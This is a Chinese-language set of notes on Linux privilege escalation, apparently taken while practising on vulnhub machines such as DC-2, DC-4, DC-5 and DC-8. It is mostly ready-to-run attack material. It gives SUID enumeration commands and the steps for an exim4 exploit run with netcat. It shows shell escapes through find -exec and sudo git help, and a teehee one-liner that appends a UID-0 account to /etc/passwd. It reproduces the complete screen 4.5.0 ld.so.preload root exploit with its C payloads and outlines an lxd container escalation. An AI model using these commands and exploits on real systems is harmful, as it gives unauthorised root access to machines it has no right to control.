1、查看SUID

查看具有SUID权限的脚本

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
##根据版本不同可以选择上面的不同命令执行查看

2、exim4

1）、查看版本

/usr/sbin/exim4 –version


2）使用msf搜索exim

根据exim4版本选择相应exp


ps：该exp直接运行在linux会存在问题，需要修改一下windows换行符问题
使用vim打开：set ff=unix保存即可。
直接上传脚本到靶场，授权。

wget ...        #一般上传到/tmp目录。
chmod 777 46996.sh
bash 46996.sh -m netcat   #运行该命令即可获得root权限


练习：vulnhub DC-8

3、find


find flag4.txt -exec "whoami" \;  #find 后面的文件必须市存在的，不然会报错
#-exec参数后面跟的是command命令，它是以 ; 为结束标志，由于各个系统中分号会有
不同的意义 因此在前面加上反斜杠
find flag4.txt -exec "/bin/bash" \; ##上面的whoami可以执行就可以使用bin/bash或者/bin/sh

有时候用/bin/bash不是root权限，然后使用/bin/sh


4、git

sudo git -p help    #使用该命令然后一页未显示完就可以使用！/bin/bash提权。未成功
!/bin/bash
### -p是分页显示 即自动提取more命令 使用该命令的时候直接一页
显示完了内容 未成功提权


然后尝试使用config

sudo git help config
!/bin/bash




成功提权。

练习 vulnhub DC-2

5、teehee

teehee命令参数-a可直接在文件末尾追加内容 利用这一特性可以直接在/etc/passwd
下直接追加root组账号即可。

echo "test:x:0:0:::/bin/bash" |sudo teehee -a /etc/passwd
然后切换到test账号即可。

练习 DC-4

6、screen

screen在exp上有脚本

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

根据使用说明，创建两个文件libhax.c和rootshell.c 之后使用gcc进行编译

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

gcc -o /tmp/rootshell /tmp/rootshell.c

生成两个文件 直接上传到靶场然后运行即可。


首先输入命令：cd /etc
然后输入命令：umask 000
然后输入命令：screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
然后输入命令：screen -ls
最后输入命令：/tmp/rootshell，成功提权


练习 vulnhub DC-5

7、lxd


先下载到kali中，使用root身份运行bash build-alpine。在当前目录生成一个压缩文件


创建hacker.sh 把漏洞库里的exp脚本拷贝到hacker.sh里面。接下来把文件alpine-v3.10-x86_64-2019
1119_1148.tar.gz和hacker.sh传输到靶场上：


chmod +x hacker.sh

./hacker.sh -f alpine-v3.14-x86_64-20210927_1136.tar.gz


练习vulnhub AI-web2